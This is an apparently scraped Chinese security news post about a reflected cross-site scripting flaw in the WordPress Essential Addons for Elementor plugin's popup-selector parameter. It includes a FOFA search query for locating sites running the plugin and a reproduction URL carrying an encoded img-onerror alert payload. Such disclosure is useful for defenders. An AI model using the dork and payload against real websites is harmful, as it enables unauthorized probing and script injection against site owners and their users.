当前位置: 首页 > news >正文

WordPress essential-addons-for-elementor xss漏洞

news 2025/6/30 10:53:32

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

Elementor 插件的 Essential Addons 遭受反射型跨站点脚本(XSS)漏洞该漏洞是由于 popup-selector 查询参数的验证和清理不充分而发生的,从而允许将恶意值反映回用户

搜索语法

FOFA:body="/wp-content/plugins/essential-addons-for-elementor-lite"

漏洞再现

https://your-ip/?popup-selector=%3Cimg_src%3Dx_onerror%3Dalert%28%22qaxnb%22%29%3E&eael-lostpassword=1


http://www.mrgr.cn/news/96435.html

相关文章:

  • 网络运维学习笔记(DeepSeek优化版) 024 HCIP-Datacom OSPF域内路由计算
  • C++的模板(十四):更多的自动内存管理
  • python实现股票数据可视化
  • 在树莓派5(8G版)上运行Ollama + LLM
  • 基于Elasticsearch的个性化内容推荐技术实践
  • SQL Server:sys.dm_hadr_physical_seeding_stats
  • 开源测试用例管理平台
  • fetch的语法规则及常见用法
  • 基于javaweb的SpringBoot水果生鲜商城系统设计与实现(源码+文档+部署讲解)
  • 基于CentOS7.0系统搭建FTP服务器
  • 无线通信技术(二):ITU、3GPP及传统波段对无线频谱的划分
  • YOLOv8环境配置及依赖安装过程记录
  • 【全栈开发】—— Paddle OCR 文字识别 + deepseek接入(基于python 最新!!!)
  • 常用登录Linux系统的方法以及操作指南
  • 深度学习篇---模型训练评估参数
  • 全流程剖析需求开发:打造极致贴合用户的产品
  • docker日志大小和保存管理
  • 【MyBatis】MyBatis 操作数据库
  • AT24Cxx移植第三方库到裸机中使用
  • 实战篇Redis